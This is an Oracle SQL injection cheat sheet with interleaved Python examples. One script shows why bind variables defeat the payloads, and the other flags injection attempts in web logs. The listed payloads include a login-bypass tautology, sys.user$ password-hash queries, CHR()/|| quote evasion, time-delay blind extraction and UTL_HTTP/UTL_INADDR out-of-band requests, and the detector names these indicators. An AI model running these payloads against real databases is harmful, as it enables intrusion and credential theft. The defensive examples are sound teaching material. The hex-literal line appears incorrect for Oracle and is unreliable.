SQL Injection Dictionary - Oracle

Oracle

Default Databases

SYSTEM Available in all versions
SYSAUX Available in all versions

Comment Out Query

The following can be used to comment out the rest of the query after your injection:

-- SQL comment


Example:

      • SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
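The example above shows why string concatenation is the root cause: the injected `--` turns the password check into a comment. As an added defender-side example (not part of the original cheat sheet), the Python script below builds the same login query both ways, spliced from user input and with bind variables, and runs the page's payload against each. An in-memory SQLite database stands in for Oracle so the script runs offline; the only thing that changes for a real Oracle target is the bind marker (python-oracledb and cx_Oracle use named `:username` binds instead of `?`). The `Users` rows are constructed sample data.

```python
import sqlite3

# Constructed sample data: SQLite is used as an offline stand-in for Oracle.
# The concatenation flaw is identical in both engines; only bind syntax differs.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

# The payload from the page's example: closes the quote, adds a tautology,
# and comments out the password predicate.
PAYLOAD = "' OR 1=1 --"

def build_concat_sql(username, password):
    """Vulnerable construction: user input becomes part of the SQL text."""
    return ("SELECT username FROM Users WHERE username = '" + username +
            "' AND password = '" + password + "'")

def login_concat(conn, username, password):
    """Vulnerable login: executes the spliced statement as-is."""
    rows = conn.execute(build_concat_sql(username, password))
    return sorted(row[0] for row in rows)

def login_bound(conn, username, password):
    """Hardened login: bind variables keep the input as data, never as SQL.
    The driver sends the statement text and the values separately, so a quote
    or comment marker inside the value cannot change the statement's shape."""
    sql = "SELECT username FROM Users WHERE username = ? AND password = ?"
    rows = conn.execute(sql, (username, password))
    return sorted(row[0] for row in rows)

if __name__ == "__main__":
    db = make_db()
    print("spliced SQL :", build_concat_sql(PAYLOAD, ""))
    print("concat login:", login_concat(db, PAYLOAD, ""))   # every user leaks
    print("bound login :", login_bound(db, PAYLOAD, ""))    # no match
```

With the spliced version the payload returns every row in `Users`; with bind variables the same input is compared literally against the `username` column and matches nothing. The same holds for the `CHR()`, `||` and `CASE` tricks listed later on this page: none of them do anything once the value is bound rather than concatenated.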

Testing Version

SELECT banner FROM v$version WHERE banner LIKE 'Oracle%';
SELECT banner FROM v$version WHERE banner LIKE 'TNS%';
SELECT version FROM v$instance;

Notes:

  • All SELECT statements in Oracle must contain a table.
  • dual is a dummy table which can be used for testing.


Database Credentials

SELECT username FROM all_users; Available on all versions
SELECT name, password from sys.user$; Privileged, <= 10g
SELECT name, spare4 from sys.user$; Privileged, <= 11g

Database Names

Current Database

SELECT name FROM v$database;
SELECT instance_name FROM v$instance;
SELECT global_name FROM global_name;
SELECT SYS.DATABASE_NAME FROM DUAL;

User Databases

SELECT DISTINCT owner FROM all_tables;

Server Hostname

SELECT host_name FROM v$instance; (Privileged)
SELECT UTL_INADDR.get_host_name FROM dual;
SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual;
SELECT UTL_INADDR.get_host_address FROM dual;

Tables and Columns

Retrieving Tables

SELECT table_name FROM all_tables;

Retrieving Columns

SELECT column_name FROM all_tab_columns;

Find Tables from Column Name

SELECT table_name FROM all_tab_columns WHERE column_name = 'password';

Find Columns From Table Name

SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';

Retrieving Multiple Tables at once

SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables;

Avoiding the use of quotations

Unlike other RDBMS, Oracle allows table/column names to be encoded.

SELECT 0x09120911091 FROM dual; Hex Encoding.
SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; CHR() Function.

String Concatenation

SELECT 'a'||'d'||'mi'||'n' FROM dual;

Conditional Statements

SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual;

Timing

Time Delay

SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;

Heavy Time Delays

AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));

Privileges

SELECT privilege FROM session_privs;
SELECT grantee, granted_role FROM dba_role_privs; (Privileged)

Out Of Band Channeling

DNS Requests

SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual;
SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual;
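The queries collected on this page are also what these probes look like in web-server logs, and the `CHR()` and `'a'||'d'` tricks from the "Avoiding the use of quotations" and "String Concatenation" sections are exactly what stops a naive keyword match from firing. As an added detection example (not part of the original page), the Python script below URL-decodes each request, folds `CHR(n)` calls and `||`-joined literals back into one string, and then matches the Oracle-specific indicators drawn from this page (`v$version`, `all_users`, `sys.user$`, `all_tab_columns`, `UTL_INADDR`, `UTL_HTTP`, `FROM dual`, `--`). The log lines are constructed samples in common Apache access-log format; the indicator names are this example's own.

```python
import re
from urllib.parse import unquote_plus

# Indicator patterns drawn from the Oracle queries listed on this page.
# Names are this example's own labels, not Oracle or vendor terminology.
INDICATORS = {
    "version_probe": re.compile(r"v\$version|v\$instance", re.I),
    "user_enum":     re.compile(r"\ball_users\b|sys\.user\$", re.I),
    "schema_enum":   re.compile(r"\ball_tables\b|\ball_tab_columns\b", re.I),
    "oob_or_delay":  re.compile(r"utl_inaddr|utl_http", re.I),
    "dual_probe":    re.compile(r"\bfrom\s+dual\b", re.I),
    "comment_trunc": re.compile(r"--"),
}

CHR_RE = re.compile(r"CHR\((\d+)\)", re.I)
# two adjacent quoted literals joined by ||  ('' inside a literal is an escaped quote)
CONCAT_RE = re.compile(r"'((?:[^']|'')*)'\s*\|\|\s*'((?:[^']|'')*)'")
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP')

def normalise(fragment):
    """Undo URL encoding, CHR() obfuscation and ||-concatenation so the
    indicator patterns see the literal the request actually builds."""
    text = unquote_plus(fragment)
    # CHR(97) -> 'a'; a produced quote is doubled so it stays a valid literal
    text = CHR_RE.sub(lambda m: "'" + chr(int(m.group(1))).replace("'", "''") + "'", text)
    # 'a'||'d'||'mi'||'n' -> 'admin', folding one pair per pass until stable
    while True:
        folded = CONCAT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", text)
        if folded == text:
            return text
        text = folded

def scan_log(lines):
    """Return (line_no, sorted indicator names, normalised request) for every
    log line whose request matches at least one Oracle injection indicator."""
    hits = []
    for line_no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        request = normalise(m.group(1))
        found = sorted(name for name, rx in INDICATORS.items() if rx.search(request))
        if found:
            hits.append((line_no, found, request))
    return hits

# Constructed sample access-log lines (Apache combined-style, no real hosts).
SAMPLE_LOG = """\
10.0.0.5 - - [18/Jul/2014:20:54:01 +0800] "GET /item?id=42 HTTP/1.1" 200 512
10.0.0.9 - - [18/Jul/2014:20:54:02 +0800] "GET /item?id=42;SELECT%20banner%20FROM%20v$version-- HTTP/1.1" 500 311
10.0.0.9 - - [18/Jul/2014:20:54:03 +0800] "GET /item?id=42%20AND%20UTL_INADDR.get_host_address(CHR(97)||CHR(98)||'.example')%20IS%20NOT%20NULL HTTP/1.1" 200 512
10.0.0.9 - - [18/Jul/2014:20:54:04 +0800] "GET /login?user='a'||'d'||'mi'||'n'%20FROM%20dual HTTP/1.1" 200 99
"""

if __name__ == "__main__":
    for line_no, found, request in scan_log(SAMPLE_LOG.splitlines()):
        print(f"line {line_no}: {', '.join(found)}  <- {request}")
```

Feeding the sample log through `scan_log` skips the benign first request and flags the other three, with the `CHR()`/`||` obfuscation resolved to `'ab.example'` and `'admin'` in the reported request. Matching on the normalised text is the point: a rule that only searches the raw URL for `admin` or for a hostname misses both of those lines. The `UTL_INADDR`/`UTL_HTTP` indicator also deserves a corresponding egress control, since the out-of-band queries above only work when the database host is allowed to resolve or fetch arbitrary external names.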

Password Cracking

A Metasploit module for JTR can be found here.

Posted 2014-07-18 20:54 by w_s_xin